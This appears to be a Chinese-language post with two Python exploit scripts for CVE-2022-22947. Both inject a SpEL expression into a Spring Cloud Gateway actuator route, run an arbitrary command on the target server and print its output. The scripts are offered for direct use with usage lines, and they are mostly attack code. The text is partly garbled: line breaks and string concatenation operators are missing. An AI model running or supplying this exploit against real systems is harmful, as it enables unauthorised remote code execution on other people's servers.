直接在pycharm跑
import requests import json print(""" ######################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################## # CVE-2022-22947 # # author:Skr11lex # ######################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################## """) headers={ 'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36', 'Content-Type':'application/json' } ####################################################### url="http://127.0.0.1"#####输入域名,最后不要有斜杠 id=input("输入执行参数:") routename="tt" data = { "id": routename, "filters": [{"name": "AddResponseHeader", "args": {"name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\u0022" id "\u0022}).getInputStream()))}"}}], "uri": "http://hello.com"} r=requests.post(url "/actuator/gateway/routes/" routename,headers=headers,data=json.dumps(data)) if (r.status_code == 201): print("[ ]创建成功,路径:" url "/actuator/gateway/routes/" routename) r=requests.post(url "/actuator/gateway/refresh",headers=headers,data=json.dumps(data)) if (r.status_code == 200): print("[ ]刷新成功") r=requests.get(url "/actuator/gateway/routes/" routename,headers=headers,data=json.dumps(data)) if (r.status_code == 200): print("[ ]输出结果") get_response = r.json() a=get_response['filters'][0].split("'")[1] print(a) else: print("目标漏洞不存在,或者检查路径是否错误")命令
import requests import json import sys print(""" ################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################ CVE-2022-22947 # author:Skr11lex # 用法:python http://127.0.0.1 id # ################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################################ """) def attack(url,command): routename="Ss" data = {"id": routename, "filters": [{"name": "AddResponseHeader", "args": {"name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\u0022" command "\u0022}).getInputStream()))}"}}], "uri": "http://hello.com"} r=requests.post(url "/actuator/gateway/routes/" routename,headers=headers,data=json.dumps(data)) if r.status_code==201: print("[ ]创建成功,路径:" url "/actuator/gateway/routes/" routename) r=requests.post(url "/actuator/gateway/refresh",headers=headers,data=json.dumps(data)) if r.status_code==200: print("[ ]刷新成功") r=requests.get(url "/actuator/gateway/routes/" routename,headers=headers,data=json.dumps(data)) if r.status_code==200: print("[ ]输出结果") a=r.json() return a['filters'][0].split("'")[1] def main(): url = sys.argv[1] command = sys.argv[2] print(attack(url, command)) if __name__ == '__main__': main()